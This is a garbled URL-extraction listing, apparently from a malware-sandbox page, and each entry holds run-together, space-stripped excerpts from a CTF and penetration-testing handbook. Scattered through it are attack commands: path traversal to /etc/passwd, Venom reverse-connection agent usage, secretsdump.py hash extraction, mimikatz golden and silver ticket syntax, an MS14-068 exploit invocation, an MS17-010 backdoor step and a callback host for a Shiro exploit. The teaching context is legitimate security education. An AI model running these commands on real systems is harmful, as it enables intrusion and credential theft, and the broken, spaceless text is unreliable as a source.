https://kong.re.kr/?p�71.5functionsareimplementedbythistool,includingthesignatureloading,whichisthemostimportant,optimizestheidenticationofRustfunctions,thusreducinganalysistime.Theresultoftherust-reversing-helperoptimizationisshowninFig.5.83.YoucanseethatthefunctionnameintheleftFunctionnamepanelhasbeenoptimized,andwecanstarttoanalyzeitnow.Asageneralruleofthumb,wetendtoanalyzethestd__rt__lang_start_internalfunction.However,unliketheregularchallenges,std__rt__lang_start_internalisRust'sinitializationfunction,whichfunctionsasthestartfunction,andthefunctionbeginer_reverse__mainfunctioncanbefoundabovecallstd__rt__lang_start_internal,soinRust,themainfunctionisusedasanFig.5.82IDAloadRustprogram3805ReverseEngineering

http://Thefullpathtothe.py

http://simfd.read

http://self.state.memory.store

http://wecangetgoodresults.2.baby

http://sim_options.py

http://wesuccessfullyoptimizedthescriptruntimefrom8.461sto7.933s.3.sakura

http://simgr.one

http://state.memory.store

https://software.intel.com/sites/landingpage/pintool/docs/97619/Pin/html/index.html.5.7.3.4CTFPractice:RecordingtheNumberofExecutedInstructionsThissectiondescribeshowtousethisinstructioncountertosolvetheCTFchallenge.ThereversechallengeinCTFcanbeabstractedasthatagiveninputstringag,computedbysomealgorithmftogettheresultenc,andthencomparetheresultencwiththedataembeddedintheprogram.Inthecasethatachangeinsomebytesintheagwillonlyaffectsomebytesintheenc,thenonecanconsiderdividingtheagintomultiplesegments,brute-forceattackingtheinput,andtreatingthealgorithmfFig.5.107CountBblfunctionFig.5.108log.logleFig.5.106Tracefunction5.7ModernReverseEngineeringTechniques407

http://www.xuetr.com/?p�191.NotethatalthoughPCHuntersupportsWindows10,theauthorisoftenunabletoupdatethesoftwareontimeduetotherapidpaceofWindows10updates.Asofthiswriting,Windows10hasbeenupdatedtoversion1909,whiletheversionsupportedbyPCHunterisstillat1809.ItisrecommendedthatyoualwayshavealowerversionofWindowsvirtualmachine.

https://doi.org/10.1007/978-981-19-0336-6_6429

http://abledata.Unlike.data

http://libc.search

http://libc-2.27.so

http://elf.got

http://p3pointer.ch

https://github.com/pwndbg/pwndbg

https://github.com/shellphish/how2heap

https://packages.ubuntu.com/xenial/glibc-source.6.6.3.2FastBinAttackSection6.6.1describesFastBinasasingle-linkedLIFOstructureconnectedusingFDpointers.nGlibc2.25andearlier,afterachunkisfreed,itisrstdeterminedifitssizedoesnotexceedthesizeofglobal_max_fast,andifso,itisputintoFastBin,otherwiseotheroperationsareperformed.ThefollowingcodeisaninterceptionofthePtmalloc2sourcecodeinGlibc2.25regardingthehandlingofFastBin.Afterthesizeofthechunksatisestheconditionthatitdoesnotexceedglobal_max_fast,itwillalsodetermineifthesizeofthechunkexceedstheminimumchunkandissmallerthanthesystemmemory,andthenaddthechunktothechaintableofthecorrespondingsize.Fig.6.17UsegdbdebugGlibcsourcecode4626PWN

https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344

http://boot.sh

http://ddebs.ubuntu.com/gettingthecorrespondingversionofvmLinuxwithdebugsym-bolsandreplacingthebzImageofthechallenge,youcanusethekernelwithsymbolstoreverseanddebugmoreeasily.Inaddition,inthenewversionofthekernel,theactualaddressmaydeviatefromtheaddressinthekernelELF,whichmaycausetheGDBtofailtorecognizesymbols,whichcanbeavoidedbymodifyingQemu�sstartupparametersbyadding�nokaslr�.Thefullstartupparametersare.-append'console=ttyS0root=/dev/ramoops=panicpanic=1nokaslr'Thisway,whenthekernelstarts,theactualaddressmatchestheaddressinbinary.Butforkernelsthatdon�thaveaccesstosymbols,howdowesetbreakpoints?Thesymbolicaddresscanbeobtainedfrom�/proc/kallsyms�afterkernelstartup.#cat/proc/kallsyms|grepbabyffffffffc0000000tbabyrelease[babydriver]ffffffffc00024d0bbabydev_struct[babydriver]ffffffffc0000030tbabyopen[babydriver]ffffffffc0000080tbabyioctl[babydriver]ffffffffc00000f0tbabywrite[babydriver]ffffffffc0000130tbabyread[babydriver]ffffffffc0002440bbabydev_no[babydriver]6.7.6AnalyzingtheProgramAfterthepreviouspreparations,let�sgetdowntobusiness.Manypeoplethinkthatattackingthekernelisdifcult,andmaynditdifculttoanalyzethekernelbinary.Normally,becauseofthelimitedtimeavailableforthegame,itisalmostimpossibletocompletelyreversetheentirekernel,sothemaintaskistondthedriver-type4906PWN

https://wikipedia.org/.

https://doi.org/10.1007/978-981-19-0336-6_7553

https://atomcated.github.io/Vigenere/whichisinChinese

https://github.com/veritas501/attachment_in_blog/tree/master/Gadgetzan.7.3BlockCiphers577

http://forcrypto1ofpwnable.kr

http://f.read

http://functionintheLinuxGNUClibraryisasfollows.int

http://functionisimplementedasfollows.int

https://github.com/pablocelayes/rsa-wiener-attack.ConsiderthefollowingRSApublickey.n=154669541286774112800350345370909838892196173691617426023040329852908193564023067943e=2702993571650777060698579724900044231559809907862476240831366414804737810584549617#e,n,d=RSAvulnerableKeyGenerator.generateKeys

https://github.com/mimoo/RSA-and-LLL-attacks.7.RSALSBOracleThisisaside-channelattackmethod.Ifyoucancontrolthedecryptionprocessandusethesameunknownprivatekeytodecryptanarbitraryciphertextandcapturethelastbitoftheplaintext,thenyoucanusethisattackmethodtodecryptthecorrespondingplaintextinO

https://github.com/mimoo/RSA-and-LLL-attacks.7.5.3DiscreteLogarithms7.5.3.1ElGamalandECCTheElGamalencryptionisapublic-keycryptosystembasedondiscretelogarithms.ItscryptographicsecurityisbasedonthefactthatifpisalargeprimenumberandgisthegeneratorofthemultiplicativegroupZp*,itisrelativelysimpletochoosea6007Crypto

http://hashlib.md

https://github.com/bwall/HashPump.AnexampleofusingHashPumpisshowninFig.7.28.Entertheknownhashvalue,thedata,thelengthofthesalt

https://github.com/blockstack/secret-sharing.Thefollowingisthebasicusageofthelibrary.Forexample,wedividetheplaintextsecretinto5parts,andhold3partstogetthesecret:

https://doi.org/10.1007/978-981-19-0336-6_8609

https://infura.io

http://ropsten.etherscan.io/address/0x7caa18d765e5b4c3bf0831137923841fe3e7258aThesourcecodeforsmartcontractsispubliclyavailableonEtherscan,andwecanperformsourcecodeauditsonEtherscan.FindthePayForFlagfunction,whichcanbeguessedtobethefunctionthatgivesustheag.Andthereisanauthenticatemodierforthisfunction.modierauthenticate{require

https://ropsten.infura.io/v3/xxxxx

http://tmp_v.to

http://Web3.to

http://personal.new

http://block.transactions.to

http://github.com/yuange1024/ethereum_yellowpaperTobetterexplaintheknowledgeinvolvedinthechallenge,hereisareferencesourcecodetoexplainthechallenge.https://github.com/Hcamael/ethre_source/blob/master/hctf2018.solAcontractcanbecreatedinacontractattheSoliditylevelwith�newHCTF2018User

http://eth.call

https://doi.org/10.1007/978-981-19-0336-6_9627

http://Image.open

http://breakimg.save

https://www.wireshark.org

http://wireshark.org/docs/man-pages/tshark.html.SeeFig.9.18foranexampleoflteringtheFTPprotocolinthesametrafcpacketasthepreviousexample.9.4.1.2CommonOperationsinTrafcAnalysisWireshark�s�Statistics�menuallowsyoutoviewthegeneralsituationoftrafcpackets,suchaswhichprotocolsareincluded,whichIPaddressesparticipatedinthesession,etc.Figures9.19and9.20showtheprotocolhierarchystatisticsandsessionstatisticsrespectively.ThesetwofunctionscanhelpusquicklylocatethetrafcweneedtoanalyzebecausetrafcanalysisinCTFoftenhasalotofnoisetrafc,andthetrafcrequiredbythechallengeauthorforthechallengeisusuallyobtainedintheLANorafewhosts,sobyviewingthetrafcinformation,wecangreatlysavethetimeofndingthetrafctoanalyze.ThemostwidelyusedtransportlayerprotocolincomputernetworksisTCP,aconnection-orientedprotocolthatallowsbothpartiestoensurethatthetransmissionistransparentandthattheyonlycareaboutthedatatheyget.However,inpractice,duetothepresenceofMTUs,TCPtrafccanbeslicedintomanysmallpackets,makingitdifculttoanalyze.Toaddressthissituation,WiresharkprovidesaFollowTCPStreamfeature,whichallowsyoutogetallthedatatransmittedbetweentwopartiesinaTCPsessionbyselectingadatagramandright-clicking�FollowTCPStream�.Fig.9.17WiresharkshowFTPprotocolFig.9.18TsharkshowFTPprotocol6409Misc

http://usb.org/sites/default/les/documents/hut1_12v2.pdfandhttps://usb.org/sites/default/les/.documents/hid1_11.pdf.TheUSBkeyboarddatagramhas8bytesatatime,asdenedinTable9.1.Sincekeysarenormallypressedoneatatimeinnormaluse,onlythekeycombinationstatusofbyte0andthekeycodeofbyte2needtobetakenintoaccount.Themeaningofthe8-bitkeycombinationofbyte0isshowninTable9.2.TheUSBmousedatagramis3bytes,seeTable9.3formoredetails.SeeFig.9.25

https://github.com/superponible/volatility-plugins.Whenthecommandsthatcomewiththeframeworkdon'tmeetyourneeds,lookforagoodplug-in.9.4.2.3MemoryImageForensicsSummaryThememoryforensicschallengescanbeeasilysolvedbyfamiliarizingourselveswiththeVolatilitytool�scommandsandbeingabletoanalyzetheextractedlesincombinationwithothertypesofknowledge

https://doi.org/10.1007/978-981-19-0336-6_10651

https://xdebug.org/download.phptodownloadacompatibleversionwithyourownenvironment

https://xdebug.org/wizard.php

http://makesurethattheuserwhothePHPwillberunningashaswritepermissionstothatdirectory.xdebug.pro

http://xdebug.pro

http://Onxdebug.auto

http://www.thinkphp.cn/down/1279.html

http://Getrequestvariablesautomatically.case

http://xxxxxx.com/download/le?name�test.docx&path�upload/doc/test.docxBasedonexperience,anarbitraryledownloadvulnerabilitymayexisthere.Thetestfoundthatby.http://xxxxxx.com/download/le?name�test.docx&path�.../.../.../.../.../etc/passwd/etc/passwd10.1PHPCodeAuditing673

https://github.com/sco4x0/huwangbei2018_easy_laravel.Duringthecompetition,hintinformationcanbefoundinsidetheHTMLsourcecode:https://github.com/qqqqqqvq/easy_laravel,youcandownloadpartofthecodedirectly,itisnotdifculttondthatthechallengeisbasedonLaravelframeworkbyauditingthecode.Thefollowingcodetellsushowaadministrator�saccountisgenerated;$factory-

http://qvq.im

https://the.bytecode.club/showthread.php?tid�5ifyourneedsomemoreinformation.Thebasiccommandsareasfollows.java-jarfernower.jarjarToDecompile.jardecomp/wherejarToDecompile.jarrepresentstheJARpackagetobedecompiled,anddecomprepresentsthedirectorywherethedecompilationresultsarestored.2.JD-GUIJavadecompilerisalsoadecompilertoolrecognizedbymanysecuritypractitionerswithagraphicalinterface,seeFig.10.47.Selectthe�File!OpenFile�menucommand,andthenselecttheJARandWARlesthatneedtobedecompiled,asshowninFig.10.48.10.2.4IntroductiontoServletsServletisacomponentspecication

http://importjava.io

http://itrequirestheexistenceofaparameter-freeconstructorintheparentclass.Therelevantinterfacesandclassesareasfollows.java.io.Serializablejava.io

http://todeserializetheobject.objectInputStream.read

http://meansthatboththeclassitselfanditssubclassescanbeserializedwiththeJDK.Forexample.importjava.io

http://objectInputStream.read

http://inwhichcasetheprogramwillraiseajava.io

http://this.name

http://this.group

http://this.id

http://chain.do

http://returnois.read

http://returnbos.to

http://copytheToolsandClientinfocodeintoTools.javaandClientinfo.java

http://baseClass.is

https://jira.jboss.org/jira/browse/RF-8064out.ush

https://xz.aliyun.com/t/3264forthoseinterested.ELwillbedescribedandanalyzedindetaillater.10.2.7ExpressionInjection10.2.7.1ExpressionInjectionOverviewFortheJavaWeb,therearetwocommontypesofvulnerabilitiesthatcancausecommandexecution:deserializationandExpressionLanguageInjection,whichareessentiallyremotecommandexecutionorremotecodeexecutionvulnerabilities.However,theseRCEvulnerabilitiesallshareacommonfeature�theyaretheresultofpoorlteringorabuseoffeaturesthatallowsanattackertoconstructacorrespondingexpressiontotriggeracommandorcodeexecutionvulnerability.10.2JavaCodeAuditing705

http://Calculator.app

http://o.to

http://contentType.to

http://bf.read

http://AttacklimitsOraclehassetcom.sun.jndi.rmi.object.trust

http://decodeObjectfromaremotelocation.Oraclesetscom.sun.jndi.ldap.object.trust

http://www.veracode.com/blog/research/exploiting-jndi-injections-java10.2.8.2DeserializationExploitToolysoserial/marshalsecysoserial/marshalsecarebothdeserializationGadgetassemblies.Whenadeserializationvulnerabilityisfound,astringofserializationdataneedstobepassedtothedeserializationfunctioncallstomakeitcompletethedeserializationandperformtheoperationweexpect

http://github.com/apache/shiro.gitgitcheckoutshiro-root-1.2.4/shiro/samples/web/shiro/samples/webNext,togetshiroupandrunning,youneedtomodifythepom.xmllebyaddingthefollowingcode.Fig.10.57Result72010CodeAuditing

http://shiro.rrjva1.ceye.io

http://popen.stdout.read

https://doi.org/10.1007/978-981-19-0336-6_11725

https://github.com/wupco/weblogger.

http://session.save

https://doi.org/10.1007/978-981-19-0336-6_12737

https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/cong/templates/metasploit-framework-wrappers/msfupdate.erb

http://nmap.org/book/inst-source.html.Aftersuccessfulinstallation,enterthecommand�nmap�intheterminal,whichwilloutputabriefusermanualforthenmap,seeFig.12.10.ThebasicuseofNmapisasfollows.Pleasenoticethatsomeofitsparameterscanbeusedtogether.

https://github.com/ro0r/proxychains-ng.gitcdproxychains-ng./congure--prex=/usr/local/Fig.12.12ResultFig.12.13Result12.1CreatingaPenetrationTestEnvironment745

https://github.com/vanhauser-thc/thc-hydra./conguremakemakeinstallExecutionofthe�hydra�commandwilloutputthecontentsofthehelpparameterbydefault,seeFig.12.18.Readerscantrytondhowtousethistoolontheirown.12.1.5InstallationofPentestBoxonWindowsPentestBoxisopen-sourcesoftwareforWindowsoperatingsystems,analogoustoKali,thatcanbeusedtopenetratetestingenvironments,withcommonsecuritytoolsFig.12.17TheinstallationcommandsonUbuntu74812VirtualTargetPenetrationTest

https://github.com/Dliv3/Venom.

https://github.com/Dliv3/Venom/releases/download/v1.0.2/Venom.v1.0.2.7z.Thedirectorystructureisasfollows.tree/FFolderPATHListRollserialnumberis8C06-787EC:.DS_Storeadmin.exeadmin_linux_x64admin_linux_x86admin_macos_x64agent.exeagent_arm_eabi5agent_linux_x64agent_linux_x86agent_macos_x64agent_mipsel_version1scriptsport_reuse.pySupposeyouhavesuccessfullytakendowntherstmachine,uploadthecom-piledletothetargethost,andthenstarttheserver.Ifthetargetdoesnothaveapublicnetworkaddressorarewallexists,soyoucannotaccessthetargetportdirectly,andyouneedtoestablishareverseconnection,thatistouseadminclienttolistensontheportasaservertobeconnected,andtheagentnodemakesanactiveconnectiontotheserver.Inthisway,wecanbypasstherestrictionofanyexistingrewalls.Andthecommandneededisasfollows.Enablelisteningonport8888ontheserver,seeFig.12.27../admin_linux_x64-lport8888Next,runtheagentonthejumoboxtoconnecttotheserverside,seeFig.12.28.agent.exe-rhost192.168.40.145-rport8888Ontheadminsideyoucanseethattheconnectionisestablished,entertheaddednode,andlistthecommandsavailable,seeFig.12.29.Thefollowingsectionexplainstheuseofportforwarding,wheretherearetwoportforwardingfunctions:localportforwardingandremoteportforwarding.12.2PortForwardingandProxies755

https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/12.3.2ms14-068Defensivedetectionmethodsforthems14-068vulnerabilityattackarewellestablished,andtheKerberosauthenticationknowledgewillbedescribedinSect.12.5.2.1.BecausethereisnoprivilegechekckingmechanisminKerberos,whenMicrosoft�simplementationoftheKerberosprotocol,theyincludePAC

http://pythongoldenPac.pyweb.lctf.com/buguake:xdsec@lctf2018@sub-dc.web.lctf.com-dc-ip172.21.0.7-target-ip172.21.0.7cmdThenalresultoftheimplementationissimilartoFig.12.39.Fig.12.37Usemimikatztoreadthepassword76212VirtualTargetPenetrationTest

https://github.com/worawit/MS17-010,whichismoreversatile,becausethetargetversionofthetestislow,sousezzz_exploit.py,andmodifythesmb_pwnfunctionwhosebehaviordefaultstocreateaTXTleontheCdrive,whileweneedtomodifyittoexecuteacommandoruploadanexecutablele,asshowninFig.12.41.Then,Metasploitisusedtogenerateanexecutablelenamedbind86.exeandplacesitinthescriptexecutiondirectory.Atthesametime,youshouldmakeMetasploitbegintolistensforbackdoorconnections

https://docs.microsoft.com/en-us/sysinternals/downloads/autologonformoredetails.

http://sam.save

http://security.save

http://system.save

http://examplesfolderandloadthemusingtheImpacketsecretsdumpscript.secretsdump.py-samsam.save-securitysecurity.save-systemsystem.save

https://docs.microsoft.com/en-us/windows/desktop/secauthn/lsa-authentication.Fig.12.45Result76812VirtualTargetPenetrationTest

https://github.com/PowerShellMaa/PowerSploit/blob/master/Exltration/Invoke-NinjaCopy.ps1.Thecommandisasfollows.Powershell

http://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.pyPythonsecretsdump.py-samsam.save-systemsystem.saveLOCAL12.4.2.2ViaDomainController�sNTDS.ditFileLikeSAMforthelocalmachine,NTDS.ditisthedatabasethatholdsthedomainuser�sidentitycredentialsandisstoredonthedomaincontroller.ThepathisC:

http://whichcanbeusedtomaintainpermissionsinsubsequentstages.Therearetwowaystoretrievestoredidentitycredentials.1.RemoteextractionUsethesecretsdump.pyscriptfromimpackettoextractthepasswordhashremotelyviadcsyncwiththefollowingcommand.secretsdump.py

https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1.ThisscriptcopiesSAM,SYSTEM,andntds.ditdirectlytoauser-controllablelocation,seeFig.12.56.Thesecretsdump.pyscriptinimpacketimplementsthefunctionofextractingthepasswordhashfromntds.ditusingthebootkeyinsystem,withthefollowingcommand

http://pythonsecretsdump.py

http://system.hiv

http://www.pwnag3.com/2014/05/what-did-microsoft-just-break-with.html.77812VirtualTargetPenetrationTest

http://scanf.com/user:krbtgt�Thecommandtogenerateagoldenticketisasfollows

http://scanf.com/sid:sid/krbtgt:hash/endin:480/renewmax:10080/pttThereisdetailedhelpforusingtheabovecommandsonthereferencepage,soIwon�tgointotoomuchdetailhere.ThefollowingaspectsneedtobeconsideredwhenusingGoldenTickets.�ThedomainKerberospolicytrustsbydefaulttheexpirationtimeoftheticket.�Thekrbtgtpasswordhasbeenchangedtwiceinarowandthegoldenticketisinvalid.�Goldenticketscanbegeneratedandusedonanyhostthatcancommunicatewiththedomaincontroller.Fig.12.63Authenticationprocess78212VirtualTargetPenetrationTest

https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos.Fig.12.64AttackstepsFig.12.65Result12.5LateralMovement783

http://scanf.com/sid:S-1-5-21-2256421489-3054245480-2050417719/target:DC.scanf.com/sid:S-1-5-21-2256421489-3054245480-2050417719rc4:83799921ccee1abbdeac4e9070614e7/service:cifs/pttTable12.2ThedifferencebetweengoldandsilverticketsTypeofserviceServicenameWMIHOST,PRCSSPowerShellremotingHOST,HTTPWinRMHOST,HTTPScheduledtasksHOSTWindowsleshareCIFSLDAPLDAPWindowsremoteadministrationtoolsRPCSS,LDAP,CIFSFig.12.67Result12.5LateralMovement785

http://scanf.com/user:krbtgt�Referencewebpages:https://adsecurity.org/?p�2011,https://adsecurity.org/?p�1640,https://adsecurity.org/?p�1515Fig.12.70ResultFig.12.71Result12.5LateralMovement787

http://les.pythonCVE-2017-11882.py

http://github.com/abatchy17/WindowsExploits/tree/master/MS14-068Youcanusethefollowingcommandstolaunchtheattack.ms14-068.exe-uDomainmember@domain-sDomainmembersid-dDomaincontrolleraddress-pDomainmemberpasswordMS14-068.exe-upc@ad.com-sS-1-5-21-2251846888-1669908150-1970748206-1116-d192.168.2.10-padmin@test.COMThesidofadomainmemberisobtainedthroughthemigratingtotheprocesslaunchedbyAD

Sharing

General

Malware Config

Signatures

Files